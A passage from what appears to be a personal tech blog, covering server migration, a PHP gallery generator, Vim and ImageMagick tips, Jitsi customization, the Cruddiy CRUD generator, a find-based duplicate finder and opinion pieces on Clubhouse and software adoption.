    Don’t even think about copying raw InnoDB files. You are in for a world of hurt. Dump to SQL and import. It’s the most clean solution.

    • Enable new crontab

    Either by copying the files from the old server or just copy paste the crontab -l contents.

    • Change your DNS records!

    After this: the migration is effectively complete!
    Tail your access_logs to see incoming requests, and check the error log for missing things.

    tail -f /var/log/apache2/*access.log

    tail -f /var/log/apache2/*error.log

    Exim

    I also needed exim4 on my new server. That’s easy enough.

    apt-get install exim4

    cp /home/backup/server.piks.nl/etc/exim4/update-exim4.conf.conf /etc/exim4/update-exim4.conf.conf

    Update: it turned out I had to do a little bit more than this.

  • Corbin: static responsive image and video gallery generator

    Corbin: static responsive image and video gallery generator

    In classic yak shaving fashion; this weekend I created a static responsive image gallery generator.
    It’s one PHP file that — when run from the command line — generates a clean, fast and responsive (aka mobile friendly) video and image gallery with navigation from a directory of images and videos. The output is one single index.html file.

    The generator itself is a single PHP file (~300 LOC). And running it on a sample folder with images and videos looks like this:

    mintty_2021-11-22_19-33-42.png (904×1311)
    Notice it converts .mov files to .mp4 which are playable in the browser

    The above generates one single index.html, that looks like this on a desktop browser:

    Notice:

    • The evenly spaced grid with a mix of portrait and landscape images also evenly spaced
    • The Fancybox image animations
    • The navigation buttons
    • The slider at the bottom
    • The indication of video files with a SVG play button
    • The autoplay of video files
    • How the user doesn’t leave the gallery page

    In the above example I use both the mouse and keyboard for navigation, both are possible.

    Here you can look at the sample gallery yourself.

    What does it do?

    Here’s what the generator does:

    • Checks for image orientation (landscape vs portrait) issues and fixes those.
    • Generates thumbnails from valid images (png/jpg etc.) with respect to orientation.
    • Converts non-web friendly video formats (3gp/mov) to mp4 with ffpmeg (few other tools do this!).
    • Adds a play button overlay to video files, to make them stand out.
    • Generates one index.html file, that together with your image and thumb folder constitute your gallery: copy it to any webserver and it will run, you don’t even need PHP to the gallery (hence static).
    • Generates a nice looking, evenly spaced, grid with thumbs that point to your images and videos and that looks good on mobile.
    • Uses Fancybox to pop and animate images and videos in a container with navigation.
    • Single PHP file that does everything (~300 LOC), you need FFmpeg to process videos, and it pulls in Fancybox via CDN.

    Why did I make Corbin?

    Because it’s fun, and because I was looking for a way to quickly share a folder of images and videos, with nice previews (i.e. thumbs), that also is viewable on a smartphone — and that is *not* Google Photos. Most solutions can’t do that.

    Other things I wanted:

    • Portable generator: one single PHP file is just that. It will run on any server with PHP 7.x and FFmpeg.
    • Portable output: one self-contained index.html file, one images folder, one thumbs folder. That’s it. There is no database or a bunch of help files (e.g. CSS).
    • Something understandable: most other solutions are more complex or clutter your system with files. This tool does not touch the original image folder, it just creates one thumb dir and one html file (converted videos also get saved in the original image folder).
    • Something malleable. E.g. it’s pretty easy to add the file names to the index.html. Just edit one line of CSS.

    Corbin?

    Yes, because:

    • Anton Corbijn is my favorite photographer
    • Corbin sounds like core bin aka core binary. And this tool does one core thing for me.
    • According to Urban Dictionary a corbin “is a very trust worthy , funny and amazing person”!

    What’s next?

    Corbin does what I need for now. Things that might be added later:

    • Recursive folder gallery generation.
    • Sorting options for images (name, date etc.).
    • Pagination?
    • More templating options?
    • On successive runs don’t convert mp4 videos or regenerate thumbs.
    • More error checking (file types etc.), much more error checking.

    I know there are tons of solutions out there, but this one is mine. And it does exactly what I want.

    Feel free to poke around! I assure you there are bugs.

  • Auto insert date when starting Vim

    I have a file where I keep notes & ideas. And I try to have as less friction as possible to add ideas to this file. To achieve this I made it so that when I am at my terminal

    • I type one letter;
    • The file opens in insert mode;
    • the current date and time are inserted;
    • and Vim starts a new line with a space indentation so I can start typing, right away.

    I edited just two files to achieve this.

    .bashrc

    An alias in .bashrc to type just one letter and start the file in Vim in insert mode:

    ~/.bashrc
    alias i="vim -c 'startinsert' /home/jan/notes/ideas.txt"
    

    .vimrc

    I added two lines to my .vimrc.

    The first inserts the date: 2021-11-05 21:40:50 (conform ISO 8601).
    The second start a fresh new line with four spaces.

    ~/.vimrc
    autocmd VimEnter ideas.txt $pu=strftime('%Y-%m-%d %H:%M:%S')
    autocmd VimEnter ideas.txt $pu='    '
  • Connecting a Dell 4K monitor to HDMI

    When I installed my new monitor — the Dell S2721QS — and attached it to my Dell laptop, something felt… off. I couldn’t quite put my finger on it, the resolution was fine (3840 x 2160), screen was fine — brightness, contrast etc. — but the overall experience was more sluggish. Especially when moving my mouse. Ah of course, this new resolution calls for different mouse speed settings! But after fiddling endlessly with those settings I concluded: that ain’t it.

    It’s something else, like I went back to pre-SSD.

    The monitor was connected to the HDMI port of a USB-C connected Dell WD19 dock, was this port faulty? Or maybe the cable? I changed cables, I changed ports, no change. Then I tried plugging in directly to the HDMI port of my laptop — a Dell Latitude 5590. No change.

    Ah maybe I should connect to the Display Port of the dock instead of HDMI. So I broke out the DP cable. Nope, same feeling.

    Hmm things just feel slower, maybe my laptop GPU isn’t handling this too well, nope, GPU graphs look fine.

    And then it hit me:

    It’s the refresh rate, dummy!

    Of course. My 4K screen has a max refresh rate of 60Hz, but the Intel Graphics tool only showed an available max refresh rate of 30Hz, because my HDMI port cannot output 4K@60Hz. Bam!

    _pn_2021-10-05_19-27-54.gif (1500×1165)

    So my monitor was connected on 30Hz, and this is not a good experience. Things feel off, sluggish, like your computer is out of breath. Maybe for some people this is barely noticeable but it’s there. So how to solve this?

    As stated I also use a dock, but the ports on the dock (2xHDMI and DP) can’t handle this output either (the bandwidth of the single USB-C port can’t drive 4K@60Hz AND power AND ethernet AND etc.). Here’s what I did, and sadly it involves ditching the dock.

    The USB-C port on the laptop is able to output 4K@60Hz, so I got a USB-C to DisplayPort cable, connected it to my monitor, and it worked. However this means I cannot use the USB-C port to connect to the dock. But I’d rather don’t have a dock than look at a screen that feels…. off.

    The difference the right cable makes

  • Thoughts on Clubhouse

    You can’t

    • Listen on demand
    • Restart/replay a conversation
    • Record a conversation or audio snippets
    • Trace back when a conversation started
    • See who is talking, you can only hear them
    • Send (text) messages to other Clubhouse users
    • Share pictures, videos, gifs or audio files
    • Use it on Android

    You can

    • Listen to audio conversations as they happen
    • See avatars of who is in the conversation
    • Start a group audio conversation with people you know
    • See Clubhouse member profiles with who they follow and who follow them
    • Minimize the app and do other things while listening
    • Receive conversation notices, as they happen, based on people you follow*

    What you get

    • Raw, unscripted watercooler conversations

    So there are a lot of things Clubhouse doesn’t do and only a few things it does do. But the almost archaic possibilities of the Clubhouse app are a large part of the appeal. The constraints punctuate the experience.

    Developers, developers, developers

    Ephemeral group conversations are of course as old as humans. And we didn’t even have to wait for the internet and smartphones for this human need to be implemented in technology. Theoretically the Clubhouse experience was already possible — pre-internet — with the plain old telephony system and it is also basically what happens on the amateur radio network frequencies (this is still a thing).

    Remember this bad boy?

    Which is why it is remarkable that it took to 2020 for such an app to exist on a smartphone. Was the idea maybe too simple? No. Clubhouse may be a primal experience but it is also a logical iteration from text messages, Instagram Stories, Snapchat and TikTok. Clubhouse adds something new to this line of — increasingly real-time — social interactions, by taking away a lot of barriers. And by being the only one that is actually real-time.

    The Clubhouse experience is the lowest bar to participation of any social app out there. You don’t have to leave the house, sit at a desk, straighten your hair, you don’t even have to be able to type. It is just you talking or listening to people.

    And Clubhouse strips down the human need for sharing without showing your face (Zoom), or having to be overly creative (TikTok). Remember that Instagram and Snapchat filters are not only successful because they are fun, they also obfuscate what you don’t want to be seen. Clubhouse doesn’t have this problem.

    Realness

    This all boils down to the lowest denominator of participation of any social app out there and the result is a very real experience. So real that it hardly makes sense for people to get ‘verified’ (blue checkmarks) you know right away if the person talking is who they say they are. I was listening to a room with Steve Ballmer, and trust me, that was Steve Ballmer.

    It’s the algorithm

    So Clubhouse offers one of the oldest human experiences of just people talking. But here is the really clever part and why we did need the internet and smartphones.
    *The Clubhouse algorithm sends a push notification when conversations you might be interested in are happening. This is probably also the only reason Clubhouse uses profiles and following/followers lists. Because your interests are, of course, based on people you follow. And this — social graph — is exactly what the internet and smartphones bring to the table that the telephone system and amateur radio can’t.

    So now what?

    A lot of Clubhouse conversations are about Clubhouse. Also a lot of people on Clubhouse are talking about social media and social influencing in general. It feels very meta. But I guess that is what typically happens when these things start.

    Clubhouse is the hottest new app at the moment, either because of their clever iOS only, FOMO inducing invite only approach, or because of the tech VC entourage that pushes the interest for the app, or maybe because that the pandemic has emphasized the need for humans to connect. It’s probably a little bit of all of the above. But you also know because of the app’s succes either one of these two things will happen: 1. Facebook will buy Clubhouse or 2. Facebook will clone Clubhouse. We’ll see.

    I see different paths forward for Clubhouse and I am curious to see how it will pan out. And the app right now is very bare, which is also the appeal. So it’ll be interesting to see how and whether they will pivot, maybe they will start adding features, maybe they will introduce recording conversations (podcasts)? And they of course will have to find ways to monetize. And they will have to do so all while the question looms: will it stay fun or is it just the newness that is appealing?

  • Merge two images in Windows from right-click context menu

    1. Download and install ImageMagick.
    2. Go to Windows Explorer and type sendto in the address bar. This will open the following path:

      C:\Users\<username>\AppData\Roaming\Microsoft\Windows\SendTo

      The files here will be available as actions from the Windows “Send to” right-click context menu.
    3. Create a new (text) file in this directory and add the following line:

      magick.exe %1 %2 -resize "x%%[fx:max(u.h,v.h)]" +append -set filename: "COMBINED-%%k" "%%[filename:].jpg"

      This is essentially what will be executed when you right click two images anywhere and select the action.
      %1 and %2 are the two files
      – the resize parameters makes sure the two images line up correctly, from here
      +append means the images will be merged side by side — horizontally — as opposed to vertically
      filename uses %k to pass some random value to the generated new filename. Otherwise it would overwrite already existing files with the same name. By generating something unique this doesn’t happen. The word COMBINED is chosen by me, you can change this to whatever you like.

      This line has extra % this is necessary when you run this script as a batch script. If you want to run it from the commandline by hand, you need to remove the double %% and replace them for single %.
    4. Name this file Merge two images side by side.bat or any name you like as long it ends with .bat, so Windows knows to execute it.
    5. Done!

    And the result looks like this. Click image or here.

  • Podcast: Donald Knuth Lectures on Things a Computer Scientist Rarely Talks About

    I recently read ‘Things a Computer Scientist Rarely Talks About’ by Donald Knuth from 2001. Recommended reading if you like reading about how a world-renowned computer scientist wrote a book about how he wrote a book that deals with another book! Sounds recursive 😏

    That last book is of course the bible and the book Knuth wrote about it is ‘3:16 Bible Texts Illuminated ‘ — published in 1991. And in 1999 Knuth gave a series of lectures at MIT ‘on the general subject of relations between faith and science’. In these lectures he explains how he went about writing this book and the thought process involved. So the lectures make for an enjoyable deep dive on creating such a book and how Knuth’s brain works, paired with discussions and insights on religion and things like eternity and finiteness.

    And it is this series of lectures that are bundled together in ‘Things a Computer Scientist Rarely Talks About’ — almost verbatim. But, the lectures have also always been available as audio files (sadly no visuals) on Knuth’s homepage. And I listened to those a few years back, and as I read this book I was reminded that I had created a RSS feed for these files, effectively creating a Knuth podcast!

    This is a later picture of Donald Knuth and not from the 1999 lectures. I added the text, of course in the only possible font.
    (I have no copyright on this picture and couldn’t find out who did actually. Feel free to drop me a line if I can accredit you, or if you want it changed.)

    I mostly created the file for myself to have the convenience of listening to the lectures in a podcast player. But I have also dropped the link to the XML file here and there over the years, and I noticed 607 unique IP addresses hit this link this month alone! There are only six lectures and one panel discussion and never any new content, so I am not sure what these numbers mean, if they mean anything at all.

    But I also remembered I had never blogged about this, until now. So without further ado here is the link:

    https://j11g.com/knuth.xml

    You can add this to your favorite podcast player. I have added the feed to Overcast myself so it looks like this which is nice.

    Having the audiofiles available in a podcast player enables you to track progress, speed up/down parts and have an enhanced audio experience.

    I do remember writing an email (no hyphen) to Knuth’s office and I received a nice reply that they thought it was ‘a great idea’, and they were actually also thinking of starting their own podcast ‘based on these materials’. However I haven’t found any link to this yet, so for now it is just this.

    If you are more into video, here is a great conversation Donald Knuth had with Lex Fridman last year. Published exactly a year ago to this day. The video is not embeddable but you can click the image to go there. Recommended.

    0.jpg (480×360)
  • Cruddiy: table relationship support via foreign keys

    Read here what Cruddiy is and what it can do for you: here is the code.

    TLDR: Cruddiy is no-code Bootstrap 4 PHP form builder for MySQL tables.

    I started Cruddiy when the Covid-19 lockdowns happened this spring, to keep me busy. And I released it on GitHub. After 25 stars 🤩 and 13 forks on GitHub and a couple of really encouraging messages on the original Cruddiy post, I thought it was time for an update.

    🥳 Cruddiy now supports table relationships via foreign keys. 🥳

    This means:

    • You can add new or delete existing table relations by picking columns that have a foreign key relation.
    • You can add specific actions for each table relation, like:
      • ON UPDATE : CASCADE / SET NULL / RESTRICT
      • ON DELETE: CASCADE / SET NULL / RESTRICT
    • Picking specific actions will result in different behavior. Please read up what these mean (mostly you want ON UPDATE CASCADE and ON DELETE CASCADE).

    Having table relations in place wil have the following results for Cruddiy:

    • On the Create form the field will be populated with the correct key information.
    • On the Update form: the correct stored value will be preselected but you can still choose (update) different values from the select list.

    Note 1: the table relationship builder is the first step in the Cruddiy CRUD creation process. However it is completely safe to ignore this step and move to the next step! I would even strongly advise doing so if you are not sure what you need to do, because it might break things. Also if you just want one or a couple of simple unrelated forms it is perfectly safe to skip this step.

    Note 2: the table relationship builder is of course just a GUI for something you can also do in PHPMyAdmin or MySQL from the commandline. However, Cruddiy makes it visible and easier to work with table relations.

    Some screenshots:

    Table relation builder. One existing relation. And a couple of dropdown lists to create new ones. Feel free to skip this step by hitting ‘Continue CRUD Creation Process’.
    In the column form columns with foreign keys are indicated by the blue icon.
    A simple two field table. As you can see the second item is preselected (as it should be). However it is still possible to select a different value.
  • New WordPress theme: Neve

    Frequent visitors might notice a change to the site: I switched WordPress themes.

    I have been a happy user of the Independent Publisher theme since this site started, and I still use it on my other blog. It’s a terrific theme and I like a lot.

    But because I really like clean and simple aesthetic I made quite a few tweaks to it, specifically to the fonts and CSS.

    My favorite themes are usually black and white themes. Two of my favorite examples of this aesthetic are https://kevq.uk/ and https://blog.pragmaticengineer.com/. Both excellent looking sites in my opinion, and a joy to read.

    So I looked closely at those sites and copied a few things from them. For example: both use the gorgeous Merriweather serif font as the main font for the body text. So did my site (this wasn’t the previous theme default font). I really like serif fonts, they add a sort of legibility and make big text blocks more readable.

    But I always kept tweaking the theme: letter-spacing, font-size, colors and more, and I was never 100% happy with it. Especially when things looked good on the desktop, it would look a bit off on mobile. Or the other way around.

    Some tweaks I made to the previous theme. Complete listing

    Neve

    Last week I came across this tweet for a new theme called Neve from ThemeIsle and the example was striking enough to give it a try. And I was happily surprised but how easy, complete and fast this theme was out of the box. I have made exactly 0 CSS tweaks to it. What you’re seeing now is default Neve. I have tried *many* themes over the years, and always most lack something. Neve checks all the boxes for what I have been looking for, for quite some time.

    And even though Neve uses sans-serif fonts, I found this theme to have the most overall consistent experience (desktop and mobile) and the configuration options are plentiful. And it’s really fast: which is really important. My site feels snappier because of it.

    So I made the decision to switch themes. And I like it a lot. The last couple of days I go to my own site, revisit old posts, just to see how they look and I am always pleased with the appearance. The line-spacing is just right, the header font-weight perfect, it looks good on dektop and mobile, it’s clean and it’s fast.

    Gripes

    There are two gripes.

    1. I noticed when you don’t center an image, the image caption will sort of blend with the text. And it will not really be clear that the caption belongs to the image. The fix is easy though: center your images and the caption will be centered. Another solution could be to make the caption font smaller or use a different shade of grey to make it more distinct.
    2. The other gripe is one I have to examine a little bit closer, but I don’t think the Neve quote blocks look all that good. If anything a good quote might be best served by a serif font to stand out a bit. But, this is by no means a deal breaker, but I might take a closer look at this.

    But also I don’t want to tweak too much. I actually really like that I can use this theme with default settings and that it looks really good. So if you’re looking for a great, clean, fast theme: give Neve a try!

  • Jitsi finetuning and customization

    Jitsi offers a great user experience because it doesn’t require an account, you just go to a Chrome URL and you’re pretty much good to go. You get a full blown video chat environment: complete with gridview, screensharing and chat options. No add ons or third party installations needed. I greatly prefer this instead of Zoom, Google Hangouts or Microsoft Teams or what have you.

    Jitsi is also a great piece of software to host. And installing and hosting your own video software conferencing software has never been easier.

    Chatting with 8 people. No problem. Emojis added for privacy (not a Jitsi feature, yet)

    Here are some tips to run the Jitsi stack smoothly on your server and how to customize Jitsi Meet.

    Tips

    • Put Ngnix in front of Jitsi. This helps to handle the bulk of the web requests. Otherwise Java will take care of this, and this is not what Java is particularly good at.
    • Use JRE11 to run jicofo and jitsi-videobridge2. The latest Debian 10 (Buster) comes with both JRE8 and JRE11. Make sure to use JRE11. This made quite a bit of difference in our tests.
    ii openjdk-11-jre-headless:amd64 11.0.7+10-2ubuntu2~18.04 amd64 OpenJDK Java runtime, using Hotspot JIT (headless)
    • Always use the latest Jitsi packages. They get updated quite frequently, and you definitely want the latest. E.g. last Friday the latest release had a bug, this was fixed the same day. So make sure you always run the latest version.
    root@meet01:/# cat /etc/apt/sources.list.d/jitsi-stable.list
    deb https://download.jitsi.org stable/

    We run the following packages.

    ii jitsi-meet 2.0.4548-1 all WebRTC JavaScript video conferences
    ii jitsi-meet-prosody 1.0.4074-1 all Prosody configuration for Jitsi Meet
    ii jitsi-meet-turnserver 1.0.4074-1 all Configures coturn to be used with Jitsi Meet
    ii jitsi-meet-web 1.0.4074-1 all WebRTC JavaScript video conferences
    ii jitsi-meet-web-config 1.0.4074-1 all Configuration for web serving of Jitsi Meet
    ii jitsi-videobridge2 2.1-197-g38256192-1 all WebRTC compatible Selective Forwarding Unit (SFU)
    • Running from package also has the benefit that the package maintainers tune several kernel parameters specifically for video chat with the installation. You definitely want this.

    Other tips

    With all of the above you should be good to go. The following two tips are optional and more user specific, if you still run into (bandwidth) issues.

    • Ask clients to scale their video quality to low definition. There is a server wide setting that should theoretically be able to enforce this, but I have not been able to get this to work.
    • Use Chrome. Jitsi does not work on Safari at all, but should work just fine on Firefox. However it seems specifically designed for Chrome. In my experience: when everyone is on Chrome, Jitsi Meet seems to work best.

    Customizing Jitsi Meet

    Every time you upgrade your Jitsi packages, all your custom changes will be overwritten. You can run this script after every upgrade to change your personal settings. Please change appropriate settings for your installation.

    #Run this after a Jitsi upgrade
    
    cp -ripv own-favicon.ico /usr/share/jitsi-meet/images/favicon.ico
    cp -ripv own-watermark.png /usr/share/jitsi-meet/images/watermark.png
    
    sed -i 's/Secure, fully featured, and completely free video conferencing/REPLACE THIS WITH YOUR TITLE TEXT/g' /usr/share/jitsi-meet/libs/app.bundle.min.js
    
    sed -i 's/Go ahead, video chat with the whole team. In fact, invite everyone you know. {{app}} is a fully encrypted, 100% open source video conferencing solution that you can use all day, every day, for free — with no account needed./REPLACE THIS WITH YOUR OWN WELCOME TEXT/g' /usr/share/jitsi-meet/libs/app.bundle.min.js
    
    sed -i 's/Start a new meeting/REPLACE THIS WITH YOUR OWN TEXT/g' /usr/share/jitsi-meet/libs/app.bundle.min.js
    
    sed -i 's/jitsi.org/yourowndomain.com/g' /usr/share/jitsi-meet/interface_config.js
    
    sed -i 's/Jitsi Meet/YOUR OWN TITLE/g' /usr/share/jitsi-meet/interface_config.js
    
    /etc/init.d/jicofo restart && /etc/init.d/jitsi-videobridge2 restart && /etc/init.d/nginx restart && /etc/init.d/prosody restart
  • Ten pieces of software that removed roadblocks

    Successful software is not defined by the number of lines of code or number of clever algorithms. More often than not, successful software is defined by how many roadblocks it removes for the user.

    Sounds obvious, right? But it usually takes a few iterations before software gains critical mass. And for a (critical) mass number of users, you need to remove roadblocks. Roadblocks that power-users or early adopters don’t mind dealing with, but for regular users make all the difference.

    Here are some examples of software that were not always the first, but did remove the right roadblocks and cleared the road for the masses.

    Netscape (Mosaic)

    Netscape is probably the most classic example of this. You already had the internet and the World Wide Web. And you had Gopher, FTP and SMTP and the likes. But critical mass? You needed something much simpler! Something that didn’t require typing in difficult commands after connecting to some remote server. But a graphical user interface where you could just point and click*. That’s what really brought the masses to the World Wide Web.

    (*You could argue that Windows 95 did exactly the same, eleven years after the Mac did it).

    VLC

    Remember when you had to download specific video codecs for your media player? I do and trust me you don’t want to do that. VLC was like a breath of fresh air because it took care of all that stuff.

    VLC was not the first (or last) desktop video player. But it was the first that bundled all codecs and made sure you could pretty much throw every imaginable video format at it, and it would just play it! It removed that roadblock.

    YouTube

    Remember emailing videos? Sure that might work. But how can you be sure the receiver has the right codec (see above)? Or that the receiving email provider won’t mark the video as spam or too big for email? YouTube completely removed all barriers for uploading, sharing and viewing videos online in one go. Just from the browser and without a subscription. A lot of roadblocks: gone.

    Spotify

    CDs were already a thing of the past. But downloading, paying for and managing individual songs was still a lot of work. Spotify managed to figure this one out, and it turned out this is actually what a lot of people wanted. Every song available, at all times for a fixed fee? Talk about removing roadblocks.

    WhatsApp

    WhatsApp was not the first or only IM/chat software, not even by a long shot. So why did it succeed (in most parts of the world) as the number one smartphone chat app? Because they removed multiple roadblocks.

    Early on WhatsApp put a lot of time and effort in making sure their software worked on any kind of cellphone, and specifically older, less powerful phones. Remember they offered a Java ME version? Because they understood chat is not a one-way street. It only works when everyone involved has the same access. Founder Jan Koum learned this from personal experience when trying to chat with family on the other side of the world on shabby internet connections.

    And he and co-founder Brian Acton even carried around old phones for a long time. For this exact reason.

    Slack

    I never had a need for Slack (I’ve been using IRC for over 20 years), but I can clearly see what they did: they removed roadblocks.

    While still offering pretty much the same core functionality as IRC offers: persistent group chat (emphasis on persistent). But: without the need of choosing servers, or setting up proxies or using intimidating software and all that other difficult stuff. They took care of all that. Oh, and you can share animated gifs.

    iPhone

    The iPhone is an amalgamation of hard- and software. But it probably belongs on this list, for all the same reasons. It was not the first smartphone, but it was the first that did everything right and it didn’t feel second grade (hardware and software wise). Before the iPhone there where many different smartphones in every shape and form, after the iPhone every smartphone looked like the iPhone. That should tell you something.

    Zoom

    I have personally never used Zoom, and from what I learned I probably won’t any time soon. But I can clearly see what’s happening here. All the (dirty) tricks they did with the installer and audio-stack: it is all about removing roadblocks. You can (and should be) critical of these kinds of tricks, but you can’t deny it made them the current go to app for video group chat, leaving Skype and the likes in the dust.

    (I also think they have the best/easiest to remember name. That probably also helps. I could see it becoming a verb.)

    C programming language

    I maybe going out on a limb here, but I think C’s portability is undeniably a large factor in the succes of C (among other things). Because C was highly portable, it removed many roadblocks for the years ahead where many different hardware platforms all needed a higher level language but did not want to reinvent the wheel. C removed that roadblock and subsequently became a dominant language.

    GPL

    Entering dodgy terrain here. Not actual software, but a license. There are *many* licenses out there. But GPL was one of the first that removed many important roadblocks, about how to share and and distribute software that paved the way for a whole lot of other things. And caused an explosion of software in the 80s and 90s (GCC, GNU/Linux et al.)

    Others?

    These are just some examples but I always like to hear others! What software do you think removed a bunch of roadblocks to pave the way for mass adoption?

  • Cruddiy: a no-code Bootstrap CRUD generator

    November 2020: Cruddiy now supports creating and deleting table relations (based on foreign keys) for cascading deletes/updates and and prepopulating select lists. Read more here.

    So you have a MySQL database and a user who should be able to do some standard database actions, like Create, Read, Update or Delete database records. Nothing fancy.
    But this is a non-technical user, so you don’t want to give them access to phpMyAdmin, which is too difficult. Or let alone give them command line access. So you need some simple database forms, built on top of your MySQL database, but you don’t want to handcode the same PHP CRUD pages again!

    Now you can use Cruddiy (CRUD Do It Yourself) and quickly generate clean CRUD pages with zero coding.

    You’ve probably seen pages like this a thousand times before. And if you have a MySQL database you can now make them yourself with just a few clicks.

    Pages like these are generated without writing a single line of code. With proper titles, pagination, actions (view/edit/delete) and sorting included.

    Above is the old Bootstrap 3 look. This is the new Bootstrap 4 look:

    20200409-cruddiy-app-index.png (1157×729)
    Cruddiy with Bootstrap 4 and search

    I got tired of programming the same pages over and over again for some simple database forms. So in classic yakshaving fashion I decided to automate this, and built a generator that generates PHP CRUD pages.

    Cruddiy is a no-code PHP generator that will generate PHP Bootstrap CRUD pages for your MySQL tables.

    The output of Cruddiy is an /app folder which includes everything you need. You can rename and move this folder anywhere you want and even delete Cruddiy when you’re done (or run it a couple of times more to get your app just the way you like it). Cruddiy is only used to generate the /app folder. And the /app folder is what your user will use.

    Why Cruddiy, tool xyz does the same thing!

    Most MVC frameworks (e.g. Symfony, Django or Yii2) are of course also able to generate CRUD pages for you. I have used all of these. But usually you end up with at least 80 Megabytes of code (no joke) and with all kinds of dependencies that you need to deploy and maintain for just a couple of PHP pages! This rubs me the wrong way.
    And of course there are many other PHP Crud generators around, but they are not libre or, more often than not, built on top other larger frameworks: so they have the same problem. Or they simply lack something else. So when I couldn’t find anyone that fit my needs I decided to make Cruddiy.

    Cruddiy goals and characteristics

    • Simple
      • No dependencies, just pure PHP.
      • Written in PHP and output in PHP. When the generator runs correctly, your generated app will run correctly.
    • Clean
      • Just generate what’s needed, nothing else.
    • Small
      • If it wasn’t obvious from the above, the app it generates should be small. Kilobytes not megabytes.
    • Portable
      • Cruddiy generates everything in one single /app folder. You can move this folder anywhere. You don’t need Cruddiy after generating what you need.
    • Bootstrap
      • Bootstrap looks clean and is relatively simple and small. I use Bootstrap 3 because I like and know it a bit better than 4.

    FAQ

    Why PHP?

    • Love it or hate it: but PHP is ubiquitous. You can download Cruddiy on most webservers and you’re good to go. wget the zip -> unpack -> check webserver permissions (chmod) -> surf to the unpacked folder in your browser and follow instructions.
    • Cruddiy is of course a sort of templating engine. It stamps out code based on templates. And if PHP is anything, it is in fact by default a template engine itself. So it’s a pretty good language for this kind of thing.
    • Cruddiy only works with MySQL: and MySQL and PHP are of course two peas in a pod.

    Cruddiy does not follow the MVC paradigm!

    Yes, look elsewhere if you need this. This is not a framework. This is a form generator.

    Your code is full of dirty hacks

    Sure, the generator does quite a bit of array mangling and dirty string replacement (hence the name), but the PHP pages Cruddiy generates are as clean as they come. And when you’re done generating pages, you can just delete Cruddiy. It completely builds a self-contained portable app that will run on almost any webserver with PHP (i.e. most).

    Your generated code is incomplete

    At the moment what’s lacking is error value checking on database inserts/updates (all fields are required and it doesn’t check field types: integers vs dates etc.). These will throw general errors or don’t do anything at all. I will probably improve this, but for most use-cases (see above) this should not be a problem. The generated code does use prepared statements and should not be vulnerable to SQLi. But hey, please drop me a line if you find something!

    Next features?

    I might add these things:

    • Darkmode
    • Bootstrap 4 theme ✔️ Fixed per 20200803
    • Export to CSV or XLS (users probably want this more often than not)
    • Rearrange column order
    • Search records (at the top of the page) ✔️ Fixed per 20200722
    • User registration (simple table with username and password: .htaccess works for now)
    • Define table relations (use for cascading deletes etc.) ✔️ Fixed per 20201126
    • More specific field types (ENUM = drop-down list BOOLEAN = checkbox etc.)
    • More and better input validation
    • Catch more database errors
    Cruddiy in action.

  • Use find (1) as a quick and dirty duplicate file finder

    Run the following two commands in bash to get a listing of all duplicate files (from a directory or location). This can help you clean out duplicate files that sometimes accumulate over time.

    The first command uses find to print all files (and specific attributes) from a specific location to a file, prefixing the size of the file in the name. This way all files with the same filename and same size can be grouped together. Which is usually a strong indicator that files are similar.

    When you run the second command you will get a sorted list of all actual duplicates, grouped together. This way, you can quickly pick out similar files and manually choose which ones to keep or delete.

    find . -type f -printf "%s-%f\t %f %c\t %p\n" >> /tmp/findcmd
    
    for i in `sort -n /tmp/findcmd|awk '{print $1}'|uniq -cd|sort -n|awk '{print $2}'`; do grep $i /tmp/findcmd; done

    The output will look something like this, you can instantly tell which files are duplicates, based on size, name and/or timestamp.

    1067761-P4270521.JPG     P4270521.JPG Wed Apr 27 18:05:04.0000000000 2011        ./Backups Laptops/Ri-janne/2011 Diversen
    1067761-P4270521.JPG     P4270521.JPG Wed Apr 27 18:05:04.0000000000 2011        ./Backups Laptops/Ri-janne/2011 camera
    1067898-IMG_3418.JPG     IMG_3418.JPG Thu Aug 28 20:08:28.0000000000 2008        ./Piks/2008/Vakantie USA 2008/Dag 7 Louisville Shopping
    1067898-IMG_3418.JPG     IMG_3418.JPG Thu Aug 28 19:08:28.0000000000 2008        ./Backups Laptops/Ri-janne/2008 USA
    1067969-P9180184.JPG     P9180184.JPG Sat Sep 18 17:45:52.0000000000 2010        ./Backups Laptops/Ri-janne/2010 Diversen
    1067969-P9180184.JPG     P9180184.JPG Sat Sep 18 17:45:52.0000000000 2010        ./Backups Laptops/Ri-janne/2010 uitzoeken
    1068244-100_2962.jpg     100_2962.jpg Thu Jul 17 18:18:52.0000000000 2008        ./.Trash-1000/files/Mijn afbeeldingen/Italia 09/Greece '08
    1068244-100_2962.jpg     100_2962.jpg Thu Jul 17 18:18:52.0000000000 2008        ./Backups Laptops/Jan/Mijn documenten/Mathea/Mijn afbeeldingen/Italia 09/Greece '08
    1068284-DSC_7640.JPG     DSC_7640.JPG Sat Apr 26 14:47:58.0000000000 2014        ./Piks/2014/20140426 KDag
    1068284-DSC_7640.JPG     DSC_7640.JPG Tue Apr 29 21:56:54.0000000000 2014        ./Piks/2014/20140426 Koningsdag
    
  • Foster: how to build your own bookshelf management web application


    foster
    /ˈfɒstə/

    verb

    1. Encourage the development of (something, especially something desirable). “the teacher’s task is to foster learning”

    TLDR: I made a personal bookshelf management web application and named it Foster and you can find it here. Here’s what I did — with gifs–, so you might build your own.

    Name

    I named it Foster. Because of *this* blog post — it accompanies the application, so it’s self-referential. And also, because I am currently reading David Foster Wallace‘s magnum opus Infinite Jest. And lastly, the word ‘foster’ makes a lot of sense otherwise, just read on 😉

    Background

    I like to read and I like to buy physical books — and keep them. Over the years I tracked both of these things in a spreadsheet. But this became unmanageable so I needed something else.

    Something like Goodreads but self-hosted. So, preferably a web application where I could:

    • track my reading progress
    • keep track of my bookshelf

    But I couldn’t find anything that fit, so I knew I probably had to roll my own. In simpler times MS Access could do this sort of thing in a heartbeat. But it’s 2019 and I wanted a web application. However I am not a web developer and certainly not a frontend developer.

    But when I came across https://books.hansdezwart.nl/ I knew this was what I was looking for! So I emailed Hans. He was very kind in explaining his application was self-coded and not open-source, but he did provide some pointers. Thanks Hans! So with those tips I built my own application (front and back) from scratch. And I decided to pass the knowledge on, with this blog.

    The Foster fronted (I am still adding books)

    This is what the Foster frontend looks like. It’s pretty self-explanatory: I can search *my* books, track and see reading progress, track collections, click through to book details and see the activity feed (more on that later). Oh, and it’s fast! ♥

    Frontend

